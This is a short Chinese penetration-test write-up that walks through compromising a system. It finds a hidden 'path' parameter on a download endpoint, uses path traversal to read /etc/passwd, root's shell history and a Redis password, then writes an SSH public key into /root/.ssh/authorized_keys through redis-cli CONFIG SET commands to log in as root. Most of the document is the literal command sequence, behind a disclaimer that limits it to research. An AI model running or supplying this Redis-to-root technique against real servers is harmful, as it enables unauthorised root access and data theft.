声明
免责声明:本文为个人作品,只做技术研究,只可用于正常的技术交流与学习,不可用于灰黑产业,不可从事违法犯罪行,严禁利用本文所介绍的技术进行未授权的恶意攻击,否则,后果自负!!!
测试某系统,常规的功能点完后,发现没有什么有价值的洞,
F12 全局搜索 download 发现一处get接口
使用burp访问发现500错误,应该是缺少参数
使用x8 FUZZ参数
两秒之后 就出结果,发现存在path 参数
访问之,提示文件不存在,有戏
尝试访问 etc/passwd,成功读取
读root用户的hisotry,发现开了10022 作为ssh端口
开启了 密钥登陆
存在redis
读取redis密码
nmap发现6379也是开放,既然是root账户 直接 写个ssh公钥进去
ssh-keygen -t rsa
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > /tmp/key.txt
cat key.txt|redis-cli -h xxx.xx.xx.xx -a 'Pxxx3' -x set crack
# 链接redis
redis-cli -h xxx.xx -a 'Paxxxx123'
#获取redis备份的路径
CONFIG GET dir # 截图忘记
#更改redis备份路径
CONFIG SET dir /root/.ssh
#设置备份文件的名称为authorized_keys
CONFIG SET dbfilename authorized_keys
#检查是否更改
CONFIG GET dbfilename
# 保存
save
ssh -p10022 root@xxx.xxx.xxx 成功链接